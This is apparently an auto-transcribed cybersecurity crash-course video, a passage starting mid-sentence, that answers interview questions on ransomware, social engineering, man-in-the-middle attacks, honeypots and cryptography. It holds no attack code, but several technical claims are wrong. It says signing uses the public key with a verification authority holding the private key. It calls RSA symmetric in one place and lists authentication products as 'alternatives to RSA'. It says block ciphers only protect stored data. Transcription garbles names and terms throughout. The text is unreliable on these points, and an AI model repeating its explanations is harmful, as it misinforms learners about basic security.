you into believing that you may have been attacked or there is a virus on your machine and then instructs you to download a particular software to mitigate that particular virus now the malware will be in this software that you will be downloading and then a ransomware will be installed and your data will be encrypted screen lockers where locking uses computers by preventing them from logging in and displaying an official looking message you will see a screen saver once you boot up which prevents you from accessing the login page so it will not allow you to log into your own machine but it will give you a warning that your data has been encrypted and you need to connect to a particular email address and send it to send bitcoins over there to get a decryption key to access your own data and then the encrypting ransomware displays a message demanding payment in return for the private asymmetry key which is needed to decrypt the symmetric keys for encrypted file so once your files have been encrypted you might just have a blank screen in front of you where you'll receive a warning message uh where it instructs you to pay up a ransom in bitcoins or in some cryptocurrency to some particular digital e-wallet which is not traceable and once you make that payment they will send you the decryption key and then you can access your data if getting your learning started is half the battle what if you could do that for free visit scale up by simply learn click on the link in the description to know more then talking about the next question what is the difference between an active and a passive cyber attack now when we talk about cyber attacks cyber attack is an activity that is caused by a malicious user who wants to try to get access or do some security incidents on the victim's devices so there are two ways that can happen it's either in an active manner or a passive manner in an active manner the intruder attempts to disrupt a network's normalcy modifies data and tries to alter the system's resources so this is more active where the attacker will proactively try to destroy the network so that communications fail or they might try to modify the data where we're using a ransom where they can encrypt it or they might delete that data using a virus or steal that data using a trojan or they might even alter the data so that it is no longer trustworthy whereas in a passive attack the intruder intercepts data traveling to a network here the intruder eavesdrop but does not modify the message so they're just listening in they're just observing what is going on they are not manipulating the data they are not stealing anything it's just that they are monitoring the activity that's going on the next question what is a social engineering attack now social engineering attack is a people based attack the victim here is the human by itself the vulnerability also lies in the human it may be executed through a computer but end of the day the calibrities of the human so it is the art of manipulating people so that they end up giving up confidential information now we always read in the papers where somebody got manipulated their passwords got hacked and somebody's life savings got wiped out right because they shared the otp with someone or they shared a the password with someone now creating a scenario where these people will fall prey to this attack and share this kind of personal information to unknown people that is where the social engineering attack comes in creating that scenario which will ensure that these people give out this confidential information now there are three categories in this attack one the first one is a fishing attack second is a sphere phishing attack and a third is a railing attack now phishing attack is basically a generic attack it is targeted to the world at large whoever falls prey to that attack will be a victim whereas a spear phishing attack is a targeted attack towards a specific individual or a group of individuals or towards an organization so there is a lot more research that goes into spear phishing where you analyze the victim you try to figure out what their vulnerabilities are and your tailor make or you customize the attack to that particular vulnerability once you have that attack you launch it against those people those people will then fall prey to this attack an availing attack is where you're attacking uh top level executives so the c-level executives of an organization politicians movie stars wealthy and powerful people so any of these people when they're attacked it will be known as a whaling attack next question what is man in the middle attack now this is something that we had touched based when we talked about arp where the arp poisoning attack needs to be executed to leverage a man in the middle attack now in the man in the middle attack the attacker attacking computer takes the ip address of the client unaware of this the server continues to communicate with the attacker now if you remember in a previous question we have also talked about spoofing so in this scenario uh attacker has spoofed their ip address to replicate themselves as a genuine client and now with that spoofing in mind they might either through our poisoning attack or just because of the spoofed ip address become a man in the middle that means that they are now each dropping on the conversation between the actual client and the server by posing themselves as a server in this scenario the attacker is now a go-between between the client and the server and can eavesdrop and can copy the data if they want they can modify the data as well so as you can see on the screen the attacker becomes man in the middle which means that they are now eavesdropping on the conversation that is happening between the client and the server the next question who are black hat hackers and whitehead hackers the main thing is the differentiation between a blackhead hacker and a white hacker now our blackhead hackers are skilled individuals who illegally hack into a system the motive behind such an attack is mostly for monetary gain these individuals are known also known as security crackers now if you look at your criminal hackers those who have malicious intent those who do hacking for the intent of personal gain or for the matter of disruption the main thing that black hat hackers lack is authorization they are not authorized to do the activity that they are about to do and they are going to get unauthorized access to devices or to data which is going to cause losses to the organization involved whereas on the other side a white hat hacker are also known as ethical hackers these are the individuals who discover vulnerabilities in a computer network and they help the organizations mitigate these vulnerabilities they help the organizations defend themselves from black hat hackers so the main difference between these two types of hackers a black hat and a white hat is the intent and the authorization so black hat hackers will have malicious intent they will try to personally gain from that attack from by finding out vulnerabilities they also will not have authorization to conduct whatever activity they are doing whereas on the other side whitehead hackers will be hired by organizations they will provide authorization for certain activity that the white hat hacker can do to find out those vulnerabilities once those vulnerabilities have been find out found out by the white hat hacker they will report it to the management and guide them in implementing security controls to mitigate those vulnerabilities the main difference between a black hat and a white hat is the authorization and the intent the next question what are honey pots now honey pots are a very interesting device that can be introduced in a network uh these basically are decoy servers that are implemented in a network to attract the attention of attacker it is there to lure an attacker uh into attacking that particular device thus creating a security blanket blanket for the rest of the devices so if an attacker has been able to bypass a firewall and is now trying to scan a particular network when they scan they will come across various devices that are there in the network they will then proceed to do a vulnerability scan on these devices the honeypot at that point in time will provide as an approve as an attraction to these attackers because it will demonstrate some vulnerabilities to the hacker which will divert their attention so these vulnerabilities are simulated on these devices these actually do not exist but the moment the attacker then starts interacting with the honeypot the honeypot will identify that as a malicious traffic and will warm the one the administrator about a possible attack that is going on the administrator will then investigate through the honeypot of what activity is going on and then reconfigure the security controls to block the attacker or mitigate the attack itself right so it is more of a decoy server uh that will showcase or simulate some vulnerabilities to an attacker thus to lure them and safeguard the rest of the network these are the 10 questions for cyber security in the next video we'll be talking about cryptography the first question define cryptography encryption and decryption now cryptography is used by security professionals to scramble data into non-readable format which is used in securing that information so it involves converting data from a readable format into a non-readable format and then reversing it back to readable format again for example the word computer is now scrambled into looking like a unreadable format now if you look at this word that it has been scrambled into it would be very difficult for a human to figure out what the actual word was now in this scenario we have taken an algorithm where we have made a shift of the alphabet where we have added two alphabets the current one so c plus two becomes e o plus 2 becomes q m plus 2 becomes o so we have done a shift of 2 and thus the key over here for this algorithm is the alphabet plus 2. so any person who figures that out will be able to unscramble this and convert this back into readable text the fact of scrambling a readable text data into something that is unreadable by using a particular key is what cryptography is all about now as we discussed the decryption again is uh replacing the alphabet and taking it further back by two characters so e minus two becomes c q minus two becomes o o minus 2 becomes m and so on so forth so anybody who knows this key uh the shift key anybody will able to decrypt this particular character so this depends on the user if i want to utilize alphabet plus five then the spacing the shifting of that character will be the fifth character from that particular character and so on so forth the next question what is the difference between cipher text and cleartext ciphertext refers to the text which is encrypted and totally undesirable the message received after decryption is known as clear text this text is comprehensible so the word computer is clear text that means that it has not been treated to any cryptographic measures it does what it is intended to be however if the moment we encrypt it that means we scramble it into unreadable text by using any of the algorithms that we'll be looking at that text is known as a cipher text and without the key this becomes unreadable the clear text as discussed is the plain word that we have utilized we are using the english language in this instance so the plain word computer is the clear text once we add the encryption layer to it we get the cipher text to it moving on to the next question what is a block cipher this refers to the method of encrypting the plain message block by block the plain message is broken down into fixed size blocks and then encrypted now a block cipher is normally used for data that is stored so a data that is stored on a hard disk and we want to encrypt that data that is known as block encryption or a block cipher so a block cipher is an algorithm that will allow you to encrypt data that is stored onto a hard disk so in this example we've got a plain text which is 64 bits in size and we have added a layer of encryption to it so plain text plus the key that we have studied in the previous questions and then the scrambled data out of it which is unreadable and thus encrypted then the next question what is public key infrastructure now the public key infrastructure is a set of policies which secures the communication between a server and a client it uses two cryptographic keys public and private so the infrastructure itself is a set of policies people procedures and techniques which are standardized in nature and are globally accepted which allow us to use digital certificates to encrypt data and decrypt the data at the other end we use asymmetric encryption over here which means that we are used two keys one is a public key to encrypt and the private key to decrypt the other part of encryption is a symmetric encryption where the same key is used to encrypt and the same key is used to decrypt now in a public key infrastructure uh like i said we have standardized that so insta in the standardizing part of it these are the various players that have been defined in the public key infrastructure the first is this user or the sender in the scenario the one who requires this digital signature to digitally sign a particular transaction or a communication a registration authority with whom they are going to register for that particular key the certification authority who issues that key the verification of the authority who validates the key itself and the recipient who is going to be the other party of that particular transaction so how is this utilized a sender or the user who requires this digital signature will request or apply for a digital signature with the registration authority the registration authority would validate the genuinely of the user so they might do some identity verification or proof of residence or something like that once they've identified the person and they have validated the information they will then send the request to the certification authority stating that the sender has been validated and we can and the certification authority can issue the digital certificate to the particular user they will send the public key to the sender which will be utilized by the sender for further transactions so when the sender is going to sign some data and wants to send it across to the recipient they will use the public key to sign it and send it across the recipient will then validate with the verification authority to see if the data the signed data is correct or not now while the certification authority sends the public key to the sender the certification authority updates the private key with the verification authority so whatever is signed by the sender received by the recipient and they want to validate it they will send it back to the verification authority the verification authority will validate using the private key once the private key is validated it will then send the ok signal back to the recipient thus allowing the validation of that particular transaction if the signature is tampered with or is not the very fiction authority is not able to validate the signature it will then send a denial message back to the recipient and the transaction will not go through so the pki enables trusted digital identities for people so the pki grants secure access to digital resources based on the infrastructure that has been created and the core of the pki is a certification authority which ensures that the trustworthiness of the digital data is ensured so going back to the previous slide these are the key players that have been standardized in the public key infrastructure the certification authority is the authority that issues the digital certificates the validation authority is the one who validates that digital certificate moving on what is rsa rsa is one of the first public key crypto systems that is used for secure data transmission it stands for reverse xiaomira and edelman now these are the three people who have created this algorithm rand rivest adi shamir and leonard edelman who are the inventors of this technique it is a symmetric cryptography algorithm which works on both public and private keys hence the encryption key is public and the decryption key is kept private now as we have discussed earlier symmetric and asymmetric cryptography symmetric cryptography is where the same key is used to encrypt and decrypt whereas a symmetric cryptography is where there are two keys to encrypt and decrypt the algorithm what are the few alternatives to rsa now rsa is an algorithm that is used for encryption there are a lot of other algorithms that can be utilized to alter or to scramble data depending on your requirements so in the previous question we have studied and we have talked about what rsa is it stands for uh reverse xiaomi and edelman three creators of that particular algorithm but there are a lot of alternatives to this algorithm depending on how secure you want that data to be and some of them are listed here on your screen duo security octa google authenticator and lastpass lastpass is a password manager so is dual security google authenticator is something that we all utilize it is an application that we can download and store on our mobile devices and we can set that up to authenticate ourselves with certain portals so it issues a unique id to us which once utilized will allow us access to those particular portals octa is an identity manager where you have created different digital identities and you have assigned them certain permissions and based on your authentication mechanisms octa will allow or disallow access to those different applications or different portals as you have configured it so all four are authorization authentication mechanisms which can be used as alternatives to rsa if getting your learning started is half the battle what if you could do that for free visit skill up by simply learn click on the link in the description to know more next question what are the prime objectives of modern cryptography and this is a very important question because we've so far looked at what cryptography is and what public key infrastructure is but what is the achievement out of it why are we utilizing it and what do we want to gain out of it so the main and the prime objectives of modern cryptography are as follows mentioned on your screen the first one is confidentiality the second one is non-repudiation third one is authenticity and the fourth one is integrity now if i go back to the first one confidentiality uh that is where i want to keep data confidential that means it will only be visible to the authorized users right so here i've created a list of people who have deemed as authorized users and have created a digital identity to them and have given access controls to those people now that is how confidentiality is ensured so when we want to keep data confidential we create a list of users who we are going to allow access to certain resources and we are going to define what access controls are to be utilized what access are allowed whether they got an administrative access or user level access and only those authorized users are going to be able to access this resources that is how we maintain confidentiality the next one is non-repudiation non-reputation is the prevention of denial of having been a part of a particular transaction so in the public key infrastructure that we discussed where a digital signature was utilized to sign a particular transaction and then sent to the recipient the sender would not be able to deny of having originated that transaction because it was using their digital certificate thus non-reputation comes into the picture uh one more example that we can have here is on our mobile phones when we use sms short messaging service and we send a message to uh to another person the person when they receive a message the number is validated by the service operator and thus the sender cannot deny having sent that message the sender at the same time can have a delivery report sent to them from that the message was delivered to the inbox of the recipient and thus if the recipient denies having received that message the delivery report becomes proof of having that message being delivered to their inbox thus both the parties cannot deny of have a of being a part of that particular transaction then comes the part of authenticity now in confidentiality we have created a digital identity assigned to a particular person and we have given them digital signatures where they cannot deny having being a part of that transaction but authenticity is the part where they try to prove that they are who they claim to be so if i am claiming a digital identity i have to prove that i am that person who i'm trying to claim to be and an example to that is when we go to our gmail.com websites it first asks us what is our username our username is normally our email address which identifies the account that we are trying to access right so this account is confidential because it is only authorized for a particular person and once they identify themselves by identifying the email address that's when the authentication part comes into the picture where it asks for the password now it has never ever happened that we just go on to the gmail.com type in a password and then it figures out which account we are talking about so the first step is always the confidentiality part where we identify which account we are talking about and then we try to authenticate as the owner of that particular account by providing the appropriate password to that account if both of these match only then do we get access to that account and we are able to make uh whatever transactions we want to make now when we are making those transactions non-reputation comes into the place where all our activity is also being logged so we have identified our account we have authenticated ourselves by providing the password so the proof is there that it is us who are trying to access it and then whatever activity we do send an email receive an email delete something attach something all of those activities are logged and stored as proof of what actions have been done so tomorrow if we deny having sent that email gmail can still prove to us through those logs that though that that activity was done by us and the fourth part is integrity which ensures that the data received and sent and sent by the sender and received by the recipient has not been modified while in motion so the integrity part is the trustworthiness of that data that the data has not been modified by any hacker or any other entity and is still trustworthy so these are the four prime objectives of modern cryptography once i have scrambled that data using my public's uh signature it is only my private signature that is going to decrypt it right using these mechanisms i will be able to achieve all these four aspects of cryptography and security next question what is safer now safer stands for secure and fast encryption routine which is also a block cipher as we have discussed previously block cipher is a cipher that is used to encrypt data that is stored so it has a 64-bit block size and byte-oriented algorithm uh cipher's encryption and decryption procedures are highly secure this technology is widely used in applications like digital payment card so when you are using your a digital payment gateway to make transactions so you have you have gone on to an online portal you want to purchase a particular item and then it takes you to another payment gateway where you have to fill in your credit card information sensitive information like your uh expiry dates cvv information and then the otp or the password that you have created for your particular account now all of these need to be secured or highly secured based on pci dss which is the payment card industry data security standard so these standards ensure that certain protocols are utilized to attain that level of security safer is one of those block ciphers that is used under the digital payment gateway infrastructure next question how does the public infrastructure public key infrastructure work now we have already discussed this in the previous diagrams we have identified the key players the certification authority the registration authority the end user who requires the digital certificate the validation authority who's going to validate it and then the recipe and the end user with whom the transaction is going to be conducted so the first point here is the request for the digital certificate is sent to the registration authority they validate it and then they okay to the certification authority who then process the request and the digital certificate is issued to the person who has requested it so when the person wants to conduct that transaction they use that digital certificate to sign that transaction with the end user the end user validates that with the validation authority and once validated the transaction goes through and now the last question what is the blowfish algorithm it is a 64-bit symmetric encryption algorithm so this is an algorithm that uses the same key to encrypt and the same key to decrypt the same secret key is used to encrypt and decrypt the messages here the operations are based on exclusive ors and additions to the on 32-bit words the key has a maximum length of 448 bits now this is a little bit technical uh you might not want to go this technical in an interview question you just need to identify what the algorithm is used for so whether it is a symmetric algorithm which means it uses the same key or uh a symmetric algorithm where it uses a public key to encrypt and a pi private key to decrypt thus the blowfish algorithm is just one more algorithm which uses symmetric encryption to encrypt and decrypt data algorithms that we have seen rsa and others that we have discussed as far as the interview questions are concerned what we need to remember is uh which algorithms are symmetric which algorithms are asymmetric what do symmetric algorithms do and what do unsymmetric uh symmetric algorithms do and we also look at block ciphers and stream ciphers block ciphers are utilized to encrypt data that is stored stationary data data addressed and stream ciphers are utilized for data in motion while they're being streamed so ssl and tls is another algorithm that comes into the picture when you're looking at streaming data and with that we have come to the end of this session on cyber security crash course i hope it was informative and interesting if you have any questions related to the topics that were covered in this video please ask away in the comment section below our team will help you solve your queries thanks for watching stay safe and keep learning hi there if you like this video subscribe to the simply learn youtube channel and click here to watch similar videos turn it up and get certified click here you